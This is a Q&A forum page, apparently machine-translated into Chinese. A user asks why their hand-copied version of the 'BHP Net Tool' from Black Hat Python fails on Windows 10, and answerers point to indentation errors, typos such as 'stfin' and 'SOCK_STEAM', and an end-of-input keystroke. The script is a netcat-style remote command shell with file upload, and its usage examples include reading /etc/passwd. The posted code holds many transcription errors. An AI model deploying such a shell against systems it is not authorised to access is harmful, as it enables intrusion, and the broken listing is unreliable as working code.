以下代码是黑帽python书中显示的脚本,但它似乎无法正常工作。我正在阅读一本电子书,在重写代码五次之后,我仍然无法让它工作(电子书因某些原因不允许复制/粘贴) )。我已经尝试了代码和书中显示的所有示例,但我得到了相同的结果 - 该行变为黑色大约一秒钟然后它在下一行创建了正常的命令行提示符(“C:\ Python27”) 。我目前正在使用Windows 10.在本书中,用户输入了“bhp.py -t localhost -p 9999”,它为用户提供了一个自定义命令shell - 对我不起作用...感谢您查看我的问题
import socket
import threading
import sys
import getopt
import subprocess
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print ("BHP Net Tool")
print
print ("USAGE: bhpnet.py -t target_host -p port")
print ("-l --listen - listen on [host]:[port] for incoming connections")
print ("-e --execute=file_to_run - execute the given file upon receiving a connection")
print ("-c --command - initialize a command shell")
print ("-u --upload=destination - upon recieving connection upload a file and write to [destination]")
print
print
print ("Examples: ")
print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -c")
print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -u=c:\\target.exe")
print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -e=\"cat /etc/passwd\"")
print ("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu", ["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload:"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
if not listen and len(target) and port > 0:
buffer = sys.stfin.read()
client_sender(buffer)
if listen:
server_loop()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STEAM)
try:
client.connect((target,port))
if len(buffer):
client.send(buffer)
while True:
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
buffer = raw_input("")
buffer += "\n"
client.send(buffer)
except:
print "[*] Exception! Exciting!."
client.close()
def server_loop():
global target
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCL_STEAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()
def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command,stderr=subprocess. STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
return output
def client_handler(client_socket):
global upload
global execute
global command
if len(upload_destination):
file_buffer = ""
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
if len(execute):
output = run_command(execute)
client_socket.send(output)
if command:
while True:
client_socket.send("<BHP:#> ")
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
response = run_command(cmd_buffer)
client_socket.send(response)
main()
答案 0 :(得分:0)
我认为您的问题是,您已经在函数def client_sender(buffer)下编写了以函数def main()开头的代码。但是,正如本书中所指出的那样,您应该将其写在函数def main()之上。
试试。
答案 1 :(得分:0)
您需要将此块缩进4个空格:
if not listen and len(target) and port > 0:
buffer = sys.stfin.read()
client_sender(buffer)
if listen:
server_loop()
然后你有一个拼写错误:stfin应该是stdin。
更改此命令后:python script.py -t localhost -p 9999启动脚本并进入行buffer = sys.stdin.read(),但它不会打印提示,这是正确的吗?否则它需要更多的修复。
答案 2 :(得分:0)
问题是键盘语言,西班牙语是Contro-Z和Enter。